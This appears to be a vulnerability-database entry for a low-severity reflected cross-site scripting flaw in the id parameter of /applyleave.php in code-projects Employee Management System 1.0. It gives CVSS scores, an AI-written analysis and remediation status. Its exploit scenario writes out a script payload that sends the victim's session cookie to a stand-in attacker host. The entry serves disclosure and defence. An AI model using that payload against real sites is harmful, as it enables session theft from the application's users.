EUVD-2026-31664
GHSA-8w67-w2p7-cw33
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
A vulnerability was determined in code-projects Employee Management System 1.0. This affects an unknown function of the file /applyleave.php. Executing a manipulation of the argument ID can lead to cross site scripting. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.
AnalysisAI
Reflected cross-site scripting in code-projects Employee Management System 1.0 allows remote unauthenticated attackers to inject arbitrary JavaScript into victim browsers via the unsanitized id parameter in /applyleave.php. The attack requires victim interaction (UI:P per CVSS 4.0), meaning a victim must visit or be socially engineered into clicking a crafted URL. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The vulnerable endpoint `/applyleave.php` must be reachable by the attacker (AV:N), and the `id` URL parameter must be reflected unsanitized in the server's HTML response - this is the direct technical precondition. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 base score of 2.1 reflects the limited real-world impact: AV:N (network-reachable) and AC:L/AT:N (no complexity or preconditions) indicate ease of reaching the vulnerable endpoint, but PR:N/UI:P means no authentication is needed yet victim interaction is mandatory - a meaningful friction point. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker crafts a URL targeting the vulnerable endpoint such as `/applyleave.php?id=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>` and delivers it via phishing email or message to an employee using the application. When the victim clicks the link and their browser renders the unsanitized response, the injected script executes in the context of the Employee Management System origin, potentially exfiltrating session cookies or performing actions on behalf of the victim. … |
| Remediation | No vendor-released patch identified at time of analysis - code-projects has not published a security advisory or patched release for this CVE as of the available data. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Authentication bypass in Discuz! X5.0 releases 20260320 through 20260501 allows unauthenticated remote attackers to acce
Authenticated remote code execution in Discuz! X5.0 releases 20260320 through 20260501 allows administrators to chain a
Unauthenticated PHP Object Injection in the Happyforms WordPress plugin (versions <= 1.26.13) allows remote attackers to
Unauthenticated PHP Object Injection in the Broadcast Live Video WordPress plugin (versions prior to 7.1.3) allows remot
Unauthenticated PHP object injection in the WordPress plugin 'Integration for Keap/Infusionsoft and Contact Form 7, WPFo
Share
External POC / Exploit Code
Leaving vuln.today